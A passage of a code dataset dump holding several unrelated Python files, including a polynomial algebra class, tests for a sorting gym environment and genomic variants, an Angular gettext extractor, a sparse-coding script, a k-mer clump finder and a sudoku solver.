indeterminates[index] * indeterminates[index + 1]\n if middle == CONSTANT:\n indeterminates = indeterminates[:index] + indeterminates[index + 2:]\n else:\n indeterminates = indeterminates[:index] + [middle] + indeterminates[index + 2:]\n except:\n index += 1\n\n if coefficient:\n self.indeterminates = indeterminates or [CONSTANT]\n self.coefficient = dtos(coefficient)\n self.degree = dtos(sum(each.degree for each in indeterminates))\n else:\n self.indeterminates = [CONSTANT]\n self.coefficient = 0\n self.degree = 0\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [[each.tolist() for each in self.indeterminates], self.coefficient, self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n if not self.degree:\n return '%s' % str(self.coefficient)\n else:\n string = '' if self.coefficient == 1 else '-' if self.coefficient == -1 else str(self.coefficient)\n string += '*'.join(str(each) for each in self.indeterminates)\n return string\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n if not self.degree:\n return '%s' % str(self.coefficient)\n else:\n string = '' if self.coefficient == 1 else '-' if self.coefficient == -1 else str(self.coefficient)\n string += ''.join(each.latex() for each in self.indeterminates)\n return string\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n print(' ' * spaces + 'number of Indeterminates:\\t %d' % len(self.indeterminates))\n print(' ' * spaces + 'coefficient :\\t %s' % str(self.coefficient))\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n for n, each in enumerate(self.indeterminates):\n print(' ' * spaces + 'Indeterminate #%02d:' % (n + 1))\n each.showdetail(5 + spaces)\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Terms are equal\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must compare with a Term!')\n\n if self.coefficient == other.coefficient:\n if self.degree == other.degree:\n if self.indeterminates == other.indeterminates:\n return True\n return False\n\n def isincreasable(self, other):\n \"\"\"\n Judge if two Terms is increasable\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must compare with a Term!')\n\n if self == ZERO_TERM or other == ZERO_TERM:\n return True\n if self.degree == other.degree:\n if len(self.indeterminates) == len(other.indeterminates):\n for n, each in enumerate(other.indeterminates):\n if self.indeterminates[n] != each:\n return False\n return True\n return False\n\n def __neg__(self):\n \"\"\"\n Return negative Term\n - T1\n \"\"\"\n return Term(*self.indeterminates, coefficient=-self.coefficient)\n\n def __add__(self, other):\n \"\"\"\n Add two Terms\n T1 + T2\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must add with a Term!')\n if not self.isincreasable(other):\n raise Exception('Increasable Term acquired!')\n\n if self == ZERO_TERM:\n return Term(*other.indeterminates, coefficient=other.coefficient)\n return Term(*self.indeterminates, coefficient=self.coefficient + other.coefficient)\n\n def __sub__(self, other):\n \"\"\"\n Subtract two Terms\n T1 - T2\n \"\"\"\n return -other + self\n\n def __mul__(self, other):\n \"\"\"\n Multiply two Terms\n T1 * T2\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Term acquired')\n\n indeterminates = self.indeterminates + other.indeterminates\n return Term(*indeterminates, coefficient=self.coefficient * other.coefficient)\n\n def __truediv__(self, other):\n \"\"\"\n Divide two Terms\n T1 / T2\n \"\"\"\n return 
self * Term(*[CONSTANT / each for each in other.indeterminates], coefficient=1 / other.coefficient)\n\n\nZERO_TERM = Term(coefficient=0)\n\n\nclass Polynomial:\n \"\"\"\n A set of terms\n \"\"\"\n\n def __init__(self, *terms):\n for each in terms:\n if not isinstance(each, Term):\n raise Exception('Each Term must be valid!')\n\n # Sort the terms by degree and number of Indeterminates\n terms = sorted(terms, key=lambda x: str(Term(*x.indeterminates)))\n terms = sorted(terms, key=lambda x: len(x.indeterminates))\n terms = sorted(terms, key=lambda x: x.degree, reverse=True)\n index = 0\n while 1:\n if index >= len(terms) - 1:\n break\n try:\n middle = terms[index] + terms[index + 1]\n if middle == ZERO_TERM:\n terms = terms[:index] + terms[index + 2:]\n else:\n terms = terms[:index] + [middle] + terms[index + 2:]\n except:\n index += 1\n\n terms = terms or [ZERO_TERM]\n self.terms = terms\n self.degree = terms[0].degree\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [[each.tolist() for each in self.terms], self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n string = '+'.join(str(each) for each in self.terms).replace('+-', '-')\n return string[1:] if string[0] == '+' else string\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n string = '+'.join(each.latex() for each in self.terms).replace('+-', '-')\n return string[1:] if string[0] == '+' else string\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n print(' ' * spaces + 'number of Terms:\\t %d' % len(self.terms))\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n for n, each in enumerate(self.terms):\n print(' ' * spaces + 'Term #%02d:' % (n + 1))\n each.showdetail(5 + spaces)\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Polynomials are equal\n P1 == P2\n \"\"\"\n if not isinstance(other, Polynomial):\n raise Exception('Must compare with a Polynomial!')\n\n if self.terms == other.terms:\n return True\n return False\n\n def __neg__(self):\n \"\"\"\n Return negative Polynomial\n - P1\n \"\"\"\n return Polynomial(*[-each for each in self.terms])\n\n def __add__(self, other):\n \"\"\"\n Add polynomials together\n P1 + P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n terms = self.terms + other.terms\n return Polynomial(*terms)\n\n __radd__ = __add__\n\n def __sub__(self, other):\n \"\"\"\n Subtract two Polynomials\n P1 - P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n if not isinstance(other, Decimal):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n return -other + self\n\n def __rsub__(self, other):\n \"\"\"\n Constant minus Polynomial\n P2 - P1\n \"\"\"\n if not isinstance(other, int) and not isinstance(other, float):\n raise Exception('Valid constant required!')\n\n return -self + other\n\n def __mul__(self, other):\n \"\"\"\n Multiply two Polynomials\n P1 * P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n if not isinstance(other, Decimal):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n terms = []\n for each in 
other.terms:\n terms += [_each * each for _each in self.terms]\n return Polynomial(*terms)\n\n __rmul__ = __mul__\n\n def __truediv__(self, other):\n \"\"\"\n Divide two Polynomials\n P1 / P2\n \"\"\"\n if not isinstance(other, int) and not isinstance(other, float) and not isinstance(other, Decimal):\n raise Exception('Not supported yet!')\n try:\n return self * (1 / other)\n except:\n raise Exception('Valid constant required!')\n # TODO __truediv__\n\n def __pow__(self, power, modulo=None):\n \"\"\"\n Power a Polynomial\n P1 ** power\n \"\"\"\n if not isinstance(power, int) or power < 0:\n raise Exception('Power must be nonnegative integer!')\n\n return reduce(lambda x, y: x * y, [self] * power, 1)\n\n\n# ---[test zone]---\n# a = Indeterminate('x', subscript='1', degree=1)\n# b = Indeterminate('y', subscript='3', degree=2)\n# c = Indeterminate('x', subscript='2', degree=4)\n# d = Indeterminate('x', subscript='1', degree=1)\n# T1 = Term(a, b, c, a, coefficient=5)\n# T2 = Term(a, a, b, coefficient=3)\n# T3 = Term(c, c, coefficient=4)\n# T4 = Term(coefficient=-1)\n# T5 = Term(a, b, d)\n# P1 = Polynomial(T2, T1, T3, T4)\n# P2 = Polynomial(T2, T3)\n# print(P1.latex())\n","sub_path":"Element.py","file_name":"Element.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"38909994","text":"import pytest\nfrom gym.spaces import flatten\n\nfrom sorting_gym.agents.scripted import bubble_sort_agent, insertion_sort_agent, quicksort_agent\nfrom sorting_gym.envs.functional_neural_sort_interface import FunctionalNeuralSortInterfaceEnv\nfrom tests.util import _test_sort_agent\n\n\ndef test_reset_gives_valid_observation():\n env = FunctionalNeuralSortInterfaceEnv(k=4, number_of_functions=5)\n obs = flatten(env.nested_observation_space, env.reset())\n assert obs.shape[0] == 68 + 5 + 6 + 51 + 1\n\n\ndef test_function_env_preserves_function_id():\n \"\"\"\n Create a functional environment with 2 functions taking 0 args and returning 0 args\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=2, function_inputs=0, function_returns=0)\n original_obs = env.reset()\n assert original_obs['current_function'] == -1\n assert env.action_space.contains((3, 0))\n obs, reward, done, info = env.step((3, 0))\n assert obs['current_function'] == 0\n obs, reward, done, info = env.step((3, 1))\n assert obs['current_function'] == 1\n # return\n obs, reward, done, info = env.step((4,))\n assert obs['current_function'] == 0\n obs, reward, done, info = env.step((4,))\n assert obs['current_function'] == -1\n\n\ndef test_function_env_can_pass_through_arg():\n \"\"\"\n Functional environment with 1 function taking 1 arg and returning 1 arg\n We will create a function that assigns the input to a local variable, and\n returns that local variable.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=1, function_returns=1)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n assert env.v[1] == n\n assert env.v[2] == 0\n # Call the function 0 with:\n # local variable ID l=0\n # outer variable ID o=1 (pointing to end of array)\n # returning ID r=2\n obs, reward, done, info = env.step((3, 0, 0, 1, 2))\n assert obs['current_function'] == 0\n assert env.v[1] == 0\n assert env.v[2] == 0\n # Now inside the function assign \"local\" variable (id 1) with the function input (id 0)\n # Which should be our locally passed in end of array pointer\n obs, reward, done, info = 
env.step((2, 1, 0))\n assert env.v[1] == n\n assert env.v[2] == 0\n # Now return from the function with local variable (id 1).\n # Returning ID is 2, so now v[2] should be n\n obs, reward, done, info = env.step((4, 1))\n assert env.v[2] == n\n\n\ndef test_function_env_swap_args():\n \"\"\"\n Functional environment with 1 function taking 2 arg and returning 2 args\n We will create a function that swaps the inputs.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=2, function_returns=2)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n env.v[1] = 1\n env.v[2] = 2\n # Call the function\n obs, reward, done, info = env.step((3, 0,\n 0, 1, # local inputs\n 1, 2, # outer variables\n 1, 2 # write over inputs\n ))\n assert obs['current_function'] == 0\n assert env.v[0] == 1\n assert env.v[1] == 2\n\n # Swap the \"local\" variables\n # Save temp var (id 2) with the first function input (id 0)\n obs, reward, done, info = env.step((2, 2, 0))\n # Assign v0 = v1\n obs, reward, done, info = env.step((2, 0, 1))\n # Assign v1 = v2\n obs, reward, done, info = env.step((2, 1, 2))\n\n assert env.v[0] == 2\n assert env.v[1] == 1\n\n # Now return from the function.\n obs, reward, done, info = env.step((4, 0, 1))\n\n # Check that the outer scope has had the variables swapped\n assert env.v[1] == 2\n assert env.v[2] == 1\n\n\ndef test_function_env_swap_args_in_call():\n \"\"\"\n Functional environment with 1 function taking 2 arg and returning 2 args\n We will create a nop function that swaps the inputs by swapping the return args.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=2, function_returns=2)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n env.v[1] = 1\n env.v[2] = 2\n # Call the function\n obs, reward, done, info = env.step((3, 0,\n 0, 1, # local inputs\n 1, 2, # outer variables\n 1, 2 # write over inputs\n ))\n assert obs['current_function'] == 0\n assert env.v[0] == 1\n assert env.v[1] == 2\n\n # Now return from the function - swapping the return values around\n obs, reward, done, info = env.step((4, 1, 0))\n\n # Check that the outer scope has had the variables swapped\n assert env.v[1] == 2\n assert env.v[2] == 1\n\n\ndef test_bubble_sort_agent():\n \"\"\"\n Functional environment should still work using the scripted\n Bubble Sort agent.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3)\n agent_f = bubble_sort_agent\n _test_sort_agent(agent_f, env, 100)\n\n\ndef test_bubble_sort_agent_not_enough_pointers():\n env = FunctionalNeuralSortInterfaceEnv(k=2)\n agent_f = bubble_sort_agent\n with pytest.raises(IndexError):\n _test_sort_agent(agent_f, env, 100)\n\n\ndef test_quick_sort_agent():\n \"\"\"\n Tests the environment using a Quick Sort agent.\n\n c.f. 
Algorithm 8 - pg 25\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=4, number_of_functions=2)\n _test_sort_agent(quicksort_agent, env, number_of_problems=100, max_steps=10000, verbose=True)\n","sub_path":"tests/test_function_env.py","file_name":"test_function_env.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643868822","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nresponses={}\npolling_active=True\nwhile polling_active:\n name=raw_input(\"\\nWhat's your name?\")\n response=raw_input(\"Which mountain would you like to climb someday?\")\n responses[name]=response\n\n repeat=raw_input(\"yes/no?\")\n if repeat=='no':\n polling_active=False\nprint(\"\\n---Poll results---\")\nfor name,response in responses.items():\n print(name.title()+\" would like to climb \"+response.title()+\".\")","sub_path":"jichu/input1.py","file_name":"input1.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508820999","text":"# Copyright (c) 2015. Mount Sinai School of Medicine\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nTest simple properties of Variant objects, such as their trimming\nof shared prefix/suffix strings from ref/alt fields.\n\"\"\"\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\nfrom pyensembl import ensembl77\nfrom varcode import Variant\nfrom nose.tools import eq_\n\ndef test_insertion_shared_prefix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"AAT\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AA\")\n eq_(variant.original_alt, \"AAT\")\n eq_(variant.original_start, 10)\n # since this variant is just an insertion of a \"T\", get rid of\n # the prefix context\n eq_(variant.ref, \"\")\n eq_(variant.alt, \"T\")\n # the [start,end] interval for an insertion is just the base we're\n # inserting after, which in this case is the 11th position\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11_12insT\")\n\ndef test_insertion_no_prefix():\n variant = Variant(1, start=11, ref=\"\", alt=\"T\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"\")\n eq_(variant.original_alt, \"T\")\n eq_(variant.original_start, 11)\n eq_(variant.ref, \"\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11_12insT\")\n\ndef test_substitution_no_prefix():\n variant = Variant(1, start=11, ref=\"A\", alt=\"T\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"A\")\n eq_(variant.original_alt, \"T\")\n eq_(variant.original_start, 11)\n eq_(variant.ref, \"A\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11A>T\")\n\n\ndef test_substitution_shared_prefix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"AT\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, 
\"AA\")\n eq_(variant.original_alt, \"AT\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"A\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11A>T\")\n\n\ndef test_deletion_shared_suffix():\n variant = Variant(1, start=10, ref=\"AAC\", alt=\"C\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AAC\")\n eq_(variant.original_alt, \"C\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"AA\")\n eq_(variant.alt, \"\")\n eq_(variant.start, 10)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.10_11delAA\")\n\n\ndef test_deletion_no_suffix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AA\")\n eq_(variant.original_alt, \"\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"AA\")\n eq_(variant.alt, \"\")\n eq_(variant.start, 10)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.10_11delAA\")\n\ndef test_serialization():\n variants = [\n Variant(\n 1, start=10, ref=\"AA\", alt=\"AAT\", ensembl=ensembl77),\n Variant(10, start=15, ref=\"A\", alt=\"G\"),\n Variant(20, start=150, ref=\"\", alt=\"G\"),\n ]\n for original in variants:\n # This causes the variant's ensembl object to make a SQL connection,\n # which makes the ensembl object non-serializable. By calling this\n # method, we are checking that we don't attempt to directly serialize\n # the ensembl object.\n original.effects()\n\n # Test pickling.\n serialized = pickle.dumps(original)\n reconstituted = pickle.loads(serialized)\n assert original == reconstituted\n\n assert original.contig == reconstituted.contig\n assert original.ref == reconstituted.ref\n assert original.alt == reconstituted.alt\n assert original.start == reconstituted.start\n assert original.end == reconstituted.end\n\n # Test json.\n serialized = original.to_json()\n reconstituted = Variant.from_json(serialized)\n assert original == reconstituted\n","sub_path":"test/test_variant.py","file_name":"test_variant.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"424634829","text":"try:\n from html.parser import HTMLParser\nexcept ImportError:\n from HTMLParser import HTMLParser\n\nimport locale\nimport logging\nimport re\n\n\ndef interpolate(data):\n interpolation_regex = r\"\"\"{\\$([\\w\\.\"'\\]\\[\\(\\)]+)\\$}\"\"\"\n return re.sub(interpolation_regex, r'%(\\1)', data)\n\n\nclass AngularGettextHTMLParser(HTMLParser):\n \"\"\"Parse HTML to find translate directives.\n\n Note: This will not cope with nested tags (which I don't think make any\n sense)\n \"\"\"\n\n def __init__(self):\n try:\n super(self.__class__, self).__init__()\n except TypeError:\n HTMLParser.__init__(self)\n\n self.in_translate = False\n self.data = []\n self.strings = []\n self.line = 0\n self.plural = False\n self.plural_form = ''\n self.comments = []\n\n def find_matches(self, string):\n for match in self._find_matches(string):\n if type(match) == tuple and len(match) == 2:\n self._add_plural_string(match[0], match[1])\n elif type(match) == tuple and len(match) == 3:\n self._add_context_string(match[0], match[1])\n else:\n self._add_string(match)\n\n def _find_matches(self, string):\n matches = []\n if not string:\n return []\n match = re.findall(r'\\.gettext\\([\"\\'](.*?)[\"\\']\\)', string)\n if match:\n matches.extend(match)\n match = re.findall(r'\\.pgettext\\([\"\\'](.*?)[\"\\'], 
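The test_variant.py record above pins down how Variant trims shared prefix/suffix bases from ref/alt: "AA">"AAT" becomes a pure insertion of "T" reported at the base it follows, and "AAC">"C" becomes a deletion of "AA". A minimal standalone sketch of that normalization, reverse-engineered from the assertions rather than taken from varcode itself:

def trim_variant(start, ref, alt):
    trimmed = 0
    # strip shared prefix bases, advancing the start coordinate
    while ref and alt and ref[0] == alt[0]:
        ref, alt, start, trimmed = ref[1:], alt[1:], start + 1, trimmed + 1
    # strip shared suffix bases; the start coordinate is unaffected
    while ref and alt and ref[-1] == alt[-1]:
        ref, alt = ref[:-1], alt[:-1]
    if not ref and trimmed:
        start -= 1  # pure insertion: report the base it inserts after
    return start, ref, alt

assert trim_variant(10, "AA", "AAT") == (11, "", "T")   # insertion, shared prefix
assert trim_variant(10, "AA", "AT") == (11, "A", "T")   # substitution, shared prefix
assert trim_variant(10, "AAC", "C") == (10, "AA", "")   # deletion, shared suffix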
+[\"\\'](.*?)[\"\\']\\)', string)\n if match:\n matches.extend([match[0] + ('+context',)])\n match = re.findall(\n r'\\.ngettext\\([\"\\'](.*?)[\"\\'], +[\"\\'](.*?)[\"\\'],[^)]*\\)', string)\n if match:\n matches.extend(match)\n return matches\n\n def _add_string(self, singular, comments=''):\n messages = interpolate(singular)\n self._add_msg(u'gettext', messages, comments)\n\n def _add_plural_string(self, singular, plural_form, comments=''):\n messages = (\n interpolate(singular),\n interpolate(plural_form)\n )\n self._add_msg(u'ngettext', messages, comments)\n\n def _add_context_string(self, singular, context, comments=''):\n messages = (\n interpolate(singular),\n interpolate(context)\n )\n self._add_msg(u'pgettext', messages, comments)\n\n def _add_msg(self, func_name, messages, comments):\n line = self.getpos()[0]\n if not comments:\n comments = []\n self.strings.append(\n (line, func_name, messages, comments)\n )\n\n def handle_starttag(self, tag, attrs):\n for attr, val in attrs:\n self.find_matches(val)\n\n def handle_data(self, data):\n self.find_matches(data)\n\n\ndef extract_angular(fileobj, keywords, comment_tags, options):\n \"\"\"Extract messages from angular template (HTML) files\n\n :param fileobj: the file-like object the messages should be extracted\n from\n :param keywords: This is a standard parameter so it is accepted but ignored.\n\n :param comment_tags: This is a standard parameter so it is accepted but\n ignored.\n :param options: Another standard parameter that is accepted but ignored.\n :return: an iterator over ``(lineno, funcname, message, comments)``\n tuples\n :rtype: ``iterator``\n \"\"\"\n if keywords:\n logging.debug('Parameter keywords ignored.')\n\n if comment_tags:\n logging.debug('Parameter comment_tags ignored.')\n\n if options:\n logging.debug('Parameter options ignored.')\n\n parser = AngularGettextHTMLParser()\n\n for line in fileobj:\n if not isinstance(line, str):\n line = line.decode(locale.getpreferredencoding())\n parser.feed(line)\n\n for string in parser.strings:\n yield(string)\n","sub_path":"angular_gettext_babel/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"537547785","text":"import numpy as np\nimport math\n\ndef find_rectangle(n): \n max_side = int(math.sqrt(n))\n for h in range(2, max_side+1)[::-1]:\n w = n // h\n if (w * h) == n:\n return (w,h)\n return (n, 1)\n\n# should work for 1d and 2d images, assumes images are square but can be overriden\ndef make_mosaic(images, n=None, nx=None, ny=None, w=None, h=None):\n if n is None and nx is None and ny is None:\n nx, ny = find_rectangle(len(images))\n else:\n nx = n if nx is None else nx\n ny = n if ny is None else ny\n images = np.array(images)\n if images.ndim == 2:\n side = int(np.sqrt(len(images[0])))\n h = side if h is None else h\n w = side if w is None else w\n images = images.reshape(-1, h, w)\n else:\n h = images.shape[1]\n w = images.shape[2]\n nx = int(nx)\n ny = int(ny)\n h = int(h)\n w = int(w)\n image_gen = iter(images)\n # should replace this code with https://stackoverflow.com/a/42041135/940196\n if len(images.shape) > 3:\n mosaic = np.empty((h*ny, w*nx, images.shape[3]))\n else:\n mosaic = np.empty((h*ny, w*nx))\n for i in range(ny):\n ia = (i)*h\n ib = (i+1)*h\n for j in range(nx):\n ja = j*w\n jb = (j+1)*w\n mosaic[ia:ib, ja:jb] = next(image_gen)\n return 
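interpolate() in the extract.py record above rewrites Angular-style {$ expr $} placeholders into Python-style %(expr) markers so that every occurrence of a translatable string yields the same msgid. A quick check of its behavior, using the record's own regex (babel treats the msgid as opaque text, so the missing printf conversion suffix is harmless for extraction purposes):

import re

def interpolate(data):
    interpolation_regex = r"""{\$([\w\."'\]\[\(\)]+)\$}"""
    return re.sub(interpolation_regex, r'%(\1)', data)

print(interpolate("Hello {$user.name$}!"))  # -> Hello %(user.name)!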
mosaic","sub_path":"make_mosaic.py","file_name":"make_mosaic.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428682826","text":"import os\n\nimport scipy\nimport spams\nimport numpy as np\n\nfrom utils.utils import *\n\nimport argparse\nimport logging\nimport logging.config\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S')\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n})\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Creates sparse contextualized representation.')\n parser.add_argument('--in_files', nargs='+', required=True) # it is assumed that the first file is used to determine matrix D\n\n parser.add_argument('--K', type=int, default=2000)\n parser.add_argument('--lda', type=float, default=0.05)\n parser.add_argument('--predefined_dictionary_file', type=str, default=None)\n\n parser.add_argument('--normalize', dest='normalize', action='store_true')\n parser.add_argument('--not-normalize', dest='normalize', action='store_false')\n parser.set_defaults(normalize=True)\n\n args = parser.parse_args()\n\n logging.info(args)\n\n params = {'K': args.K, 'lambda1': args.lda, 'numThreads': 8, 'iter': 1000, 'batchsize': 400, 'posAlpha': True, 'verbose': False}\n lasso_params = {x:params[x] for x in ['L','lambda1','lambda2','mode','pos','ols','numThreads','length_path','verbose'] if x in params}\n lasso_params['pos'] = True\n dict_file = args.predefined_dictionary_file # when follows random:x pattern, the dictionary is randomly generated using seed x\n D = None\n\n for i, in_file in enumerate(args.in_files):\n print(in_file)\n assert os.path.exists(in_file)\n\n embeddings = np.load(in_file)\n if args.normalize:\n embeddings = row_normalize(embeddings)\n embeddings = embeddings.T\n if not np.isfortran(embeddings):\n embeddings = np.asfortranarray(embeddings)\n\n if dict_file is None:\n dict_file = '{}_norm{}_K{}_lda{}'.format(in_file, args.normalize, args.K, args.lda)\n\n if not os.path.exists('{}.npy'.format(dict_file)):\n logging.info(\"Dictionary learning for embeddings of shape: {}\".format(embeddings.shape))\n D = spams.trainDL(embeddings, **params)\n np.save(dict_file, D)\n logging.info(\"Dictionary learning completed...\")\n else:\n logging.info('Dictionary file already exists')\n continue\n elif D is None and dict_file.startswith('random:'):\n seed = int(dict_file.split(':')[1])\n dict_file = '{}_norm{}_K{}_lda{}_rnd{}'.format(in_file, args.normalize, args.K, args.lda, seed)\n np.random.seed(seed)\n D = col_normalize(embeddings @ np.random.randn(embeddings.shape[1], args.K)).astype(embeddings.dtype)\n dd = D.T @ D\n ddd = [dd[i,j] for i in range(dd.shape[0]) for j in range(dd.shape[1]) if i>j]\n logging.info((np.mean(ddd), np.std(ddd), np.min(ddd), np.max(ddd)))\n np.save(dict_file, D)\n logging.info('Random dictionary generated using {}.'.format(dict_file))\n\n alphas_file = '{}_{}_norm{}_K{}_lda{}'.format(dict_file, os.path.basename(in_file), args.normalize, args.K, args.lda)\n logging.info((dict_file, alphas_file))\n\n D = np.load('{}.npy'.format(dict_file))\n if not np.isfortran(D):\n D=np.asfortranarray(D)\n logging.info((D.dtype, embeddings.dtype, D.shape, embeddings.shape))\n\n alphas = spams.lasso(embeddings, D=D, **lasso_params)\n scipy.sparse.save_npz(alphas_file, alphas.T)\n logging.info((alphas_file, alphas.nnz, alphas.shape, 
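find_rectangle() in the make_mosaic.py record above searches heights downward from floor(sqrt(n)) for an exact factorization, so grids come out as close to square as n allows, with primes degrading to a single row. A usage sketch, assuming the file is importable as make_mosaic:

import numpy as np
from make_mosaic import find_rectangle, make_mosaic

print(find_rectangle(12))  # (4, 3): widest exact grid with height <= sqrt(12)
print(find_rectangle(7))   # (7, 1): primes fall back to one row

tiles = np.random.rand(12, 8, 8)   # twelve 8x8 grayscale tiles
print(make_mosaic(tiles).shape)    # (24, 32): 3 rows of 4 tiles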
alphas.nnz/alphas.shape[1]))\n","sub_path":"src/02_sparsify.py","file_name":"02_sparsify.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"207276353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 05 09:15:32 2018\n\n@author: Memphis\n\"\"\"\n\nwith open('rosalind_ba1e.txt') as input_data:\n text = input_data.readline().strip()\n k, L, t = map(int, input_data.readline().strip().split())\n \nkmers = {}\nfor i in range(len(text)-k+1):\n\tpattern = text[i:i+k]\n\tif pattern in kmers.keys():\n\t\tkmers[pattern] += 1\n\telse:\n\t\tkmers[pattern] = 1\n#print len(kmers)\n\"\"\"\ndelete all the kmers with less than t repeats in whole length\nwill decrease the search space in later search\n\nvery clever!\n\"\"\"\nkmers2 = kmers.copy()\nfor i in kmers2:\n if kmers2[i] < t:\n del kmers[i]\n#print len(kmers)\nres = []\nfor i in range(len(text) - L + 1):\n for pattern in kmers.keys():\n if text[i:i+L].count(pattern) >= t:\n if pattern not in res:\n res.append(pattern)\n\nprint(' '.join(res))","sub_path":"bioinformatics textbook track/BA1E.py","file_name":"BA1E.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499638836","text":"\ndef extract_zones(board):\n \"\"\"Read the board and extract the number of elements\n in all the squares (3x3),\n rows and columns. Add them in an array sorted desc\n by how many elements they have\"\"\"\n zones = []\n # extract lines info\n for row in range(0, len(board)):\n zone = {}\n zone[\"type\"] = \"row\"\n zone[\"len\"] = len(board[row]) - board[row].count(0)\n zone[\"coord\"] = row\n insert_sorted(zone, zones)\n # extract columns info\n for col in range(0, 9):\n nr_elements = 0\n for row in range(0, 9):\n if board[row][col] != 0:\n nr_elements += 1\n zone = {}\n zone[\"type\"] = \"col\"\n zone[\"len\"] = nr_elements\n zone[\"coord\"] = col\n insert_sorted(zone, zones)\n # extract squares info\n for square in generate_square_coords():\n nr_elements = 0\n for row in range(square[\"row_begin\"], square[\"row_end\"] + 1):\n for col in range(square[\"col_begin\"], square[\"col_end\"] + 1):\n if board[row][col] != 0:\n nr_elements 